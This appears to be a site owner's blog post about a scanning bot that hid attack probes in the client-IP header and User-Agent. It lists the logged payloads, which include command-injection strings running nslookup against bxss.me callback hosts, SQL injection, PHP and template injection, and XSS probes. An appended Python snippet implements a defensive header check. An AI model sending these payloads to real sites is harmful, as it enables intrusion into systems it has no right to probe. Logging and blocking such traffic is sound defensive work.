
The smarter mal bot/person


Interesting. I still review and occasionally evolve the protections on a website I made ages ago.

Normally the vuln-scanning bots are all the same, but recently a more evolved one appeared.

While it still couldn’t get through, below is a snapshot of the requests it threw at the site that were detected as malicious.

The interesting thing is that these attempts came not as GET or POST data, but as the client IP (presumably in request headers) and the User-Agent.

Fodder for a new type of block. The site currently doesn’t block on these attributes. The bot was just too greedy and attempted to throw malicious GET and POST data at the same time and was blocked on that.

I suppose I could also block on an IP header containing any characters except for 0-9 or a full stop.

User-Agents are a bit trickier, as they can be all sorts. The best bet there is to continue not to interact with them beyond doing string-literal matches for some classic bot UAs.

59401248.test.com
${10000321+9999278}
".gethostbyname(lc("hitep"."gnbgcigbe8bd4.bxss.me.
HttP://bxss.me/t/xss.html?%00
bxss.me/t/xss.html?%00
"+"A".concat(70-3).concat(224).concat(120).concat ";print(md5(31337));$a=" "&&sleep(271000)ktquad&&" ${@print(md5(31337))} ) "||sleep(271000)daeukw||" !(()&&!||| ^(#$!@#$)(()))*
1DDt4clO
<!--
(nslookup -q=cname hithjakuieuax0fb11.bxss.me||cur
$(nslookup -q=cname hituymnytxxdcf974f.bxss.me||cu
|(nslookup -q=cname hitfizvqeokrg615c6.bxss.me||cu
`(nslookup -q=cname hitvpghzgpblt2bd0e.bxss.me||cu
;(nslookup -q=cname hitzurepnhxzgdcf61.bxss.me||cu
XH7Zc
D1fJcQa3
-1 OR 2+690-690-1=0+0+0+1 --
-1 OR 2+519-519-1=0+0+0+1
-1" OR 2+727-727-1=0+0+0+1 --
0"XOR(if(now()=sysdate()
1 ˤˢ%2527%2522
@@3x1iB
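As an added example (not code from the post or the site), here is the blocking rule described above: the digits-and-dots check on the client-IP header, backed by real address parsing so that a legitimate IPv6 client is not rejected, plus the literal User-Agent match. The header name X-Forwarded-For and the bot UA literals are assumptions, and the sample requests are constructed from the snapshot above.

```python
import ipaddress
import re

# The post's rule: a client-IP header may contain only digits and full stops.
# Assumption (not from the post): the header is X-Forwarded-For, which can carry
# a comma-separated chain of addresses, so each element is checked on its own.
DIGITS_AND_DOTS = re.compile(r"[0-9.]+")

# Literal UA fragments to match, as the post suggests. Constructed placeholders,
# not the site's real list.
KNOWN_BOT_UA_LITERALS = ("sqlmap", "nikto", "python-requests")


def ip_header_is_clean(value: str) -> bool:
    """True only if every element of the header parses as an IP address.

    The digits-and-dots rule is applied first; ipaddress parsing then rejects
    strings that pass the character check but are not addresses ("1.2.3").
    An element containing ':' is tested as IPv6 so real IPv6 clients survive.
    """
    for raw in value.split(","):
        item = raw.strip()
        if not item:
            return False
        try:
            if ":" in item:
                ipaddress.IPv6Address(item)
            elif DIGITS_AND_DOTS.fullmatch(item):
                ipaddress.IPv4Address(item)
            else:
                return False
        except ValueError:
            return False
    return True


def ua_is_known_bot(user_agent: str) -> bool:
    """Plain substring match against the bot list; the UA is never parsed."""
    ua = user_agent.lower()
    return any(literal in ua for literal in KNOWN_BOT_UA_LITERALS)


def classify(headers: dict) -> str:
    """Return 'block' or 'allow' for one request's headers (constructed format)."""
    forwarded = headers.get("X-Forwarded-For")
    if forwarded is not None and not ip_header_is_clean(forwarded):
        return "block"
    if ua_is_known_bot(headers.get("User-Agent", "")):
        return "block"
    return "allow"
```

The forwarded-IP header is client-supplied, so it is only a block signal; the address used for logging and rate limiting should still come from the socket peer or a trusted proxy.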
